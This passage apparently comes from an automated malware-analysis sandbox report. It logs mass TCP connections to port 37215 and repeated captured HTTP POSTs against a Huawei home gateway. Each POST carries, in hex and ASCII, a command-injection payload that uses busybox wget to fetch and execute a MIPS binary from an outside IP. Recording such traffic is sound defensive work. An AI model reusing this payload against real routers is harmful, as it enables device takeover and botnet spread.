Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.3.125.240:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.67.194.226:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.130.178.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.145.184.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.82.228.39:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.173.81.174:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.33.101.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.225.31.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.231.83.107:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.8.115.191:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.214.90.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.46.138.150:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.215.1.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.200.156.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.217.62.141:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.17.125.173:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.86.58.247:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.228.123.228:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.42.253.238:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.243.44.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.103.131.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.187.64.108:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.25.5.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.191.251.139:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.216.7.179:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.94.98.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.62.191.30:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.229.37.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.120.137.211:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.185.6.41:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.248.119.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.63.205.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.40.88.230:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.202.207.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.196.28.223:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.168.252.255:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.255.231.146:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.119.97.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.124.89.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.255.39.92:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.83.169.154:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.210.47.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.89.244.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.149.161.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.45.159.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.162.199.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.174.182.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.143.196.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.126.27.30:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.62.199.155:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.50.108.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.44.33.245:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.16.175.11:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 156.24.147.26:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 